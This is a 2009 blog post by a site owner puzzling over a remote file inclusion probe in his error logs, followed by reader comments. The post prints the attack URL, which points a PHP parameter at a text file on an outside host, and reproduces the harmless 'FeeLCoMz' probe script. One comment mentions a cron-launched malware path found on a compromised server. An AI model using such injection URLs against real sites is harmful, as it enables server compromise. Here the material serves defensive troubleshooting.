There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:
http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?
My banana was once part of a bunch very similar to this one
Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obviousl hack-attempts is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly ‘go away page‘ 
.
In this case, the URL carries a payload that is itself a link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in it’s entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ’sKriptKiDee’, aka ‘Wanker’ on the sending end.
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on it’s back?
Analyzing the url gets me to this reduction of required parts:
* any .php file path.
* any query string, that contains a ‘http://’ in
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’
will cause the same problem on an awful lot of famous name servers. For example, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.
For example, in the following link, everything except ‘www.amazon.com’ is made up
http://www.amazon.com/a.php?b=http://c.gif?
but it still exhibits the same behaviour – WTF is going on?
and why, oh why can’t I detect it in my .htaccess file?
First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.
gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.
Good luck!
_________________________________
Still no replies and it’s still happening…. where have all the gurus gone?
July 3rd, 2009 at 7:14 pm
I’m not a guru but I did get something like this on my server.
I first deleted the cron that looked something like this.
/home/virtual/site1/fst/var/tmp/.fx/y2kupdate >/dev/null 2>&1
Then deleted all the files that start with php in the /tmp folder.
I found a file that had been unzipped fx.tgz in the path above
and deleted it and the files.
I was first made aware of all of this in my cron. Check your crons.
August 13th, 2009 at 3:46 pm
For enlightenment about this specific variant of remote file inclusion (RFI) attacks, see:
http://www.josepino.com/?howto_website_hack1
Since you use WordPress, consider Bad Behavior. Stops ‘em good.
August 13th, 2009 at 5:51 pm
Thanks for the note – This annoyed the life out of me for a while….
August 20th, 2009 at 1:21 pm
l;kl;